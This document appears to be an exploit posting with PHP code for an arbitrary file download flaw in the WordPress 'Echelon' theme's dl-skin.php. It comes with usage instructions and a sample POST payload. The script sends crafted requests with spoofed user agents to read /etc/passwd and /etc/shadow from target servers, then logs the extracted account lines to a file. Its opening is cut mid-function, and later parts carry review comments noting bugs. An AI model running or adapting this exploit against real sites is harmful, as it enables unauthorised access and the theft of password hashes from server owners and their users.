*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL *Description:* This exploit allows an attacker to download any writable file from the server. *Usage info:* Put the path of the file in the exploit's file field, then click the "Download" button; the file is returned directly. File download of /etc/passwd & /etc/shadow. The flaw consists of an exploitable $_POST parameter (file) in /wp-content/themes/echelon/lib/scripts/dl-skin.php. The following fields are exploited for Arbitrary File Download *POST:* _mysite_download_skin={$config['file']}&submit=Download ex: _mysite_download_skin=/etc/passwd&submit=Download *Exploit:* $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? 
// Tail of the request helper (presumably __request_info(), which the script body below
// calls); its signature and the foreach header are on the previous line. It returns the raw
// response ('corpo', headers included because CURLOPT_HEADER is set), curl_getinfo() output
// ('server') and a one-line summary ('info'), or FALSE.
array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE; }

/**
 * Inspects one fetched response and reports whether it looks like a passwd-style file.
 *
 * @param array $config  Only 'file' (the path that was requested), 'alvo' (target base URL)
 *                       and 'line' (a separator string) are read here; 'line' is not set
 *                       anywhere visible in this excerpt — presumably earlier in the file.
 * @param array $rest    Value returned by the request helper; only 'corpo' (raw response,
 *                       response headers included) is read. If the helper returned FALSE,
 *                       $rest['corpo'] is an array-offset read on a bool (null plus a warning).
 * @return void  Prints to stdout and, on a positive match, appends the extracted lines
 *               to EXPLOIT_WPAFD_Echelon.txt in the current working directory.
 */
function main($config,$rest) {
    __plus(); // defined elsewhere in the file; not visible in this excerpt
    // NOTE(review): date("h:m:s") is 12-hour hour, MONTH, seconds — 'i' would be minutes.
    print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n";
    // The parentheses act as the PCRE delimiters; each pattern captures whole lines that
    // start with a well-known passwd account name. Only the full-match group ([0]) is used.
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
    $res = NULL;
    // The verdict rests solely on the literal "root" appearing anywhere in the response
    // (headers included, case-insensitive), so any unrelated page containing that word
    // is reported as a positive — the extracted lines below may then be empty.
    if (preg_match("#root#i", $rest['corpo'])) {
        $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
        $res.=$config['line'] . "\n";
        foreach ($_final as $value) {
            $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
        }
        $res.=$config['line'];
        __plus();
        // Appends (never truncates), so repeated runs accumulate in the same file.
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    } else {
        print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
    }
}

// Script body: prints a banner, then requests and inspects /etc/passwd and /etc/shadow in turn.
// $config['alvo'] and $config['exploit'] are read by the helper but not assigned anywhere
// visible here — presumably set earlier in the file.
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
$config['file'] = '/etc/passwd';
// A fresh curl handle is created per request; the helper closes it before returning.
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $line; // $line is not assigned anywhere visible — verify it is defined; $config['line'] is used elsewhere
// $rest['info'] is only meaningful when the helper did not return FALSE.
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();